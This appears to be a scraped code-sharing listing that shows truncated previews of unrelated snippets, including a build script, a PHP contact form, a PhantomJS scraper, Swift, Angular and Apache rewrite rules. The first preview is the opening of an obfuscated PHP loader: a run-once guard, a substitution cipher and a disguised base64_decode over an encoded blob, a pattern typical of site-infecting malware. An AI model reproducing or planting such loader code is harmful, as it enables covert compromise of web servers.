This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')) | |
{ | |
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1); | |
$noybeoges = 4330; function ljiqdwbjdv($hwahkuh, $vzkil){$atrcibarge = ''; for($i=0; $i < strlen($hwahkuh); $i++){$atrcibarge .= isset($vzkil[$hwahkuh[$i]]) ? $vzkil[$hwahkuh[$i]] : $hwahkuh[$i];} | |
$sewla="base" . "64_decode";return $sewla($atrcibarge);} | |
$hrnup = 'e7XbfYTZ6GepgHYRQDTRGHO86RQiLkyYNkKwCK3ve7XbfYTZ6GepgH'. | |
'O86PTXQ2g8Q2A2jSoKvNi5SdlwxDXWQHY3vSMmuGBW6GBXu4Y3fFTbG41wxFr2jSoKvNi5SdlXQ2g8QX'. | |
'TR6Gl8Q21wxDQpASdaIewoQHY3G41wxFYWx7XmfGepASdaIep5Sh3vfFupLF1X6DXb6FepLXlLrs'. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var gulp = require('gulp'); | |
var replace = require('gulp-replace'); | |
var del = require('del'); | |
var vinylPaths = require('vinyl-paths'); | |
var runSequence = require('run-sequence'); | |
var shell = require('gulp-shell'); | |
var imageResize = require('gulp-image-resize'); | |
var rename = require("gulp-rename"); | |
var SRC = { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- include your own success html here --> | |
<?php | |
if(isset($_POST['email'])) { | |
// Lienas requeridas | |
$email_to = "[email protected]"; | |
$email_subject = "Formulario de Contacto"; | |
$urlMaster = "http://yourdomain.com/"; | |
function died($error) { | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function encontrar_bordes(relieve){ | |
var nuevaMatrix = new Array(relieve.length); | |
for (var x = 0; x < relieve.length; x++) { | |
nuevaMatrix[x] = new Array(relieve[x].length); | |
for (var y = 0; y < relieve[x].length; y++) { | |
var isMon = true; | |
if(x - 1 >= 0 && relieve[x - 1][y]){ | |
isMon = isMon && relieve[x][y] <= relieve[x - 1][y]; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
console.log('Loading a web page'); | |
var page = require('webpage').create(); | |
var url = 'http://noticias.caracoltv.com/'; | |
page.settings.userAgent = 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'; | |
var JQUERY = 'http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js'; | |
var blockedResources = [ | |
'ads.rubiconproject.com', | |
'snapwidget.com', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// ViewController.swift | |
// Cal | |
// | |
// Created by Alejandro Next on 5/07/16. | |
// Copyright © 2016 alejonext.co. All rights reserved. | |
// | |
import UIKit |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import { Pipe, PipeTransform, Injectable } from '@angular/core'; | |
/** | |
* | |
* <input [(model)]="query" type="text" /> | |
* <ul> | |
* <li *ngFor="let hero of heroes | search:query" >{{hero.name}}</li> | |
* </ul> | |
*/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RewriteEngine On | |
# If requested resource exists as a file or directory | |
# (REQUEST_FILENAME is only relative in virtualhost context, so not usable) | |
RewriteCond %{DOCUMENT_ROOT}%{REQUEST_URI} -f [OR] | |
RewriteCond %{DOCUMENT_ROOT}%{REQUEST_URI} -d | |
# Go to it as is | |
RewriteRule ^ - [L] | |
# If non existent | |
# If path ends with / and is not just a single /, redirect to without the trailing / |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env node | |
// vfukksrevjoarnql | |
const file = 'FILE'; | |
const ram = NaN; | |
const _ = require('underscore'); | |
const path = require('path'); | |
const fs = require('fs'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.3.15/angular.min.js"></script> | |
<script src="index.js"></script> | |
<ANY share="twitter" text="Hey is cool!!" via="@alejonext"/> |